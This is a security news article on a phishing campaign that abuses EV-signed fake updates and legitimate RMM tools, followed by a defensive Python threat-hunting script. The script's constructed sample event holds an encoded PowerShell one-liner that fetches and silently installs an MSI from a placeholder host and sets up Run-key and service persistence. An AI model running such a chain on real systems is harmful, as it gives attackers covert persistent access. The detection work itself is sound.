Microsoft Defender researchers have published a new threat report warning of fresh tactics in phishing attacks against business computers. Cybercriminals do not rest; they stay a step ahead of defenses and once again surprise with their “audacity” and “originality.”
Phishing attacks continue to grow and, together with ransomware, are the leading threat in cybersecurity. The number of these attacks has risen 119% over the last three years, and beyond their sheer volume they stand out for the variety of their campaigns. The strategy here does not involve breaching a sophisticated security system, exploiting a new zero-day vulnerability, or anything else that comes to mind when you hear the word “hacking.” The attackers simply devised an admittedly ingenious scheme to infiltrate corporate computers using legitimate software.
Novel phishing attacks
It all starts with emails carrying fake meeting invitations, PDF documents and other malicious links. When a targeted user clicks a link to “update” a popular application such as Microsoft Teams, Zoom, Google Meet, or Adobe Reader, they are actually downloading malware onto their computer.
But here’s the thing: Microsoft discovered that the malicious files were digitally signed with an Extended Validation (EV) code-signing certificate, issued to a company called TrustConnect Software PTY LTD, that was being abused.
Now, EV certificates are not easy to obtain, since they require strict identity verification by the Certificate Authority (CA). As ESET Distinguished Researcher Aryeh Goretsky noted in the comments, an EV certificate does not automatically prevent antivirus software from scanning a file, but it does give it a higher reputation score. The Proofpoint report adds that “when used by threat actors, they can help criminals evade signature-based detections”. A valid signature only proves who signed the file, not that the file is safe; a signer allowlist, not the mere presence of a signature, is the control that matters.
Once downloaded and run, the malware lays the groundwork for the whole operation. It first copies itself into the Program Files directory to pass as a legitimate application, registers itself as a Windows service, and creates a Run key in the registry so that it starts every time the computer boots. With that foothold in place, it uses obfuscated, encoded PowerShell commands to silently install legitimate remote monitoring and management (RMM) tools such as ScreenConnect, Tactical RMM, and Mesh Agent.
Because corporate IT departments use these same tools every day to manage company computers, the malicious traffic blends in with normal administration. The attackers gain a persistent backdoor into the corporate network, with remote desktop control and system-level command execution, without raising any red flags. According to the Microsoft report, they even install several RMM tools at once, so that access survives if a security team detects and removes one.
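The chain described above (a binary signed by an unfamiliar organisation running from Program Files, an encoded PowerShell one-liner, an RMM agent install, a Run key and a service for persistence) is exactly what a hunt query should tie together per host, rather than alerting on any one stage. The following is an added example written for this article, not code from the Microsoft report: it decodes `-EncodedCommand` blobs (Base64 of UTF-16LE) before matching, tags each stage, and flags hosts where several stages coincide. The event fields (`host`, `Image`, `CommandLine`, `Signer`), the signer allowlist, the list of RMM agents treated as unsanctioned, and all sample events are constructed assumptions for the example.

```python
"""Hunt for the signed-loader -> encoded PowerShell -> RMM install -> persistence
chain over process-creation events. Added example; event fields, allowlists and
every sample event below are constructed, not taken from the Microsoft report."""
import base64
import re

# RMM agents the article names, which this (hypothetical) environment does NOT sanction.
UNSANCTIONED_RMM = ("screenconnect", "tacticalrmm", "tactical rmm", "meshagent", "mesh agent")

# Code-signing subjects this (hypothetical) environment already trusts. Anything else
# that is signed and runs from Program Files deserves a look, EV or not.
TRUSTED_SIGNERS = {"Microsoft Windows", "Microsoft Corporation",
                   "Zoom Video Communications, Inc.", "Adobe Inc."}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INSTALL_VERBS = ("msiexec", "invoke-webrequest", "downloadfile", "start-process", "/silent", "/qn")
RUN_KEY_WRITES = ("reg add", "set-itemproperty", "new-itemproperty")
SERVICE_CREATES = ("sc create", "sc.exe create", "new-service")


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return the set of detection tags that fire on one process-creation event."""
    tags = set()
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    signer = ev.get("Signer")

    # Signed by an organisation we have never trusted, launched from Program Files: the loader.
    if signer and signer not in TRUSTED_SIGNERS and "\\program files" in image:
        tags.add("unfamiliar-signer")

    # Never match on the opaque blob; decode it and inspect the script it carries.
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        tags.add("encoded-powershell")
    text = (decoded if decoded is not None else cmd).lower()

    if any(r in text for r in UNSANCTIONED_RMM) and any(v in text for v in INSTALL_VERBS):
        tags.add("rmm-install")
    if "currentversion\\run" in text and any(w in text for w in RUN_KEY_WRITES):
        tags.add("run-key-persistence")
    if any(s in text for s in SERVICE_CREATES):
        tags.add("service-install")
    return tags


def hunt(events, min_stages=3):
    """Group tags per host; return hosts where at least min_stages distinct stages were seen."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(analyze_event(ev))
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= min_stages}


# Constructed sample telemetry. The "updater" on WS07 runs an encoded PowerShell
# one-liner that fetches an MSI, installs it, and persists via a Run key and a service.
SAMPLE_SCRIPT = (
    "Invoke-WebRequest https://updates.example.invalid/agent.msi -OutFile $env:TEMP\\a.msi; "
    "msiexec /i $env:TEMP\\a.msi /qn; "
    "Set-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name Updater -Value 'C:\\Program Files\\TeamsUpdate\\TeamsUpdate.exe'; "
    "New-Service -Name MeshAgent -BinaryPathName 'C:\\Program Files\\Mesh Agent\\MeshAgent.exe'"
)
SAMPLE_EVENTS = [
    {"host": "WS01", "Image": "C:\\Program Files\\Zoom\\bin\\Zoom.exe",
     "Signer": "Zoom Video Communications, Inc.", "CommandLine": "Zoom.exe --update"},
    {"host": "WS07", "Image": "C:\\Program Files\\TeamsUpdate\\TeamsUpdate.exe",
     "Signer": "Example Updater Pty Ltd", "CommandLine": "TeamsUpdate.exe /silent"},
    {"host": "WS07", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Signer": "Microsoft Windows",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()},
]

if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(host, stages)
```

Legitimate IT activity will trip `rmm-install` or `service-install` on its own, which is why the hunt only surfaces hosts where several stages line up and why the RMM list should contain only agents your organisation does not deploy; an unfamiliar signer on a Program Files binary is worth triaging even by itself.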
Once that control is established, the attackers can do pretty much whatever they want with the affected computers: breach internal servers to steal intellectual property, customer databases, or financial records, or move laterally from a single infected laptop straight to the primary domain controller. The possibilities are endless.
This is an ongoing threat, and Microsoft recommends that companies and employees take extreme care with any downloaded file whose provenance is not certain. The full report is available on the Microsoft security blog.
